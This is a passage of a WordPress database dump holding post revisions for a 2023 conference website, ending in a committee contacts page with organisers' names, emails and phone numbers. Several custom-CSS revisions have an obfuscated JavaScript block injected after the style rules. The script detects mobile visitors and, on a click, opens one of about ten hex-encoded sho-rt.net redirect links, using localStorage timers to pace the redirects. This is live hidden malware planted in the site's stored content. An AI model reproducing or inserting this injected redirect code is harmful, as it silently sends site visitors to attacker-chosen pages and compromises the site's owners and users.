_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 12:58:55','2023-06-27 12:58:55','',4823,'https://gsw2023.com/?p=4922',0,'revision','',0),
(4924,4,'2023-06-27 13:04:04','2023-06-27 13:04:04','#bottom-bar .wf-float-left{\n	display: none !important;\n}\n#bottom-bar .wf-float-right{\n	float: none !important;\n	width: 100% !important;\n	text-align: center !important;\n}\n\n\n.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 13:04:04','2023-06-27 13:04:04','',4823,'https://gsw2023.com/?p=4924',0,'revision','',0),
(4926,4,'2023-06-27 13:05:35','2023-06-27 13:05:35','#bottom-bar .wf-float-left{\n	display: none !important;\n}\n#bottom-bar .wf-float-right .bottom-text-block{\n	float: none !important;\n	width: 100% !important;\n	text-align: center !important;\n}\n\n\n.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 13:05:35','2023-06-27 13:05:35','',4823,'https://gsw2023.com/?p=4926',0,'revision','',0),
(4927,4,'2023-06-27 13:09:25','2023-06-27 13:09:25','<p>[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\n<p>[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" 